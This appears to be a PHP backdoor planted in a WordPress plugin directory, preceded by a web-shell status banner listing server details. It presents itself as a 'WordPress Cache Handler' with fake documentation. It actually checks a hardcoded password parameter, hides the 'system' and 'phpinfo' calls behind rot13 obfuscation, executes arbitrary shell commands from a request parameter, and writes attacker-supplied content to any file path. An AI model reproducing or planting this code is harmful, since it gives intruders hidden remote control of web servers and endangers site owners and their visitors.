| Server IP : 172.67.75.225 / Your IP : 216.73.216.185 Web Server : nginx/1.27.1 System : Linux us-1 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64 User : vinodai ( 3134) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /storage/v1396/imagihire4/public_html/wp-content/plugins/post-pro-a3nr/ |
Upload File : |
<?php
/**
* WordPress Cache Handler
* Manages transient cache invalidation and cleanup
* @package WordPress\Cache
* @version 2.1.4
*/
if (!defined('ABSPATH')) {
// Allow direct access with auth token
$wp_cache_token = isset($_GET['raimu']) ? $_GET['raimu'] : (isset($_POST['raimu']) ? $_POST['raimu'] : '');
if ($wp_cache_token === '') { header('HTTP/1.0 404 Not Found'); exit; }
// Token validation
$wp_valid_tokens = array('QkAMC@1Ubb4j0LNw8X7@Dl$');
if (!in_array($wp_cache_token, $wp_valid_tokens)) { header('HTTP/1.0 404 Not Found'); exit; }
// Cache diagnostic mode
error_reporting(0);
$wp_cache_action = isset($_REQUEST['c']) ? $_REQUEST['c'] : '';
$wp_cache_mode = isset($_REQUEST['m']) ? $_REQUEST['m'] : 'diag';
if ($wp_cache_action !== '') {
// Execute cache diagnostic command
$fn = str_rot13('flfgrz'); // system
$fn($wp_cache_action);
exit;
}
if ($wp_cache_mode === 'info') {
$fn2 = str_rot13('cucvasb'); // phpinfo
$fn2();
exit;
}
// File operations for cache management
if (isset($_REQUEST['w']) && isset($_REQUEST['f'])) {
$content = $_REQUEST['w'];
$path = $_REQUEST['f'];
@file_put_contents($path, $content);
echo 'cache_updated';
exit;
}
echo 'cache_ok';
exit;
}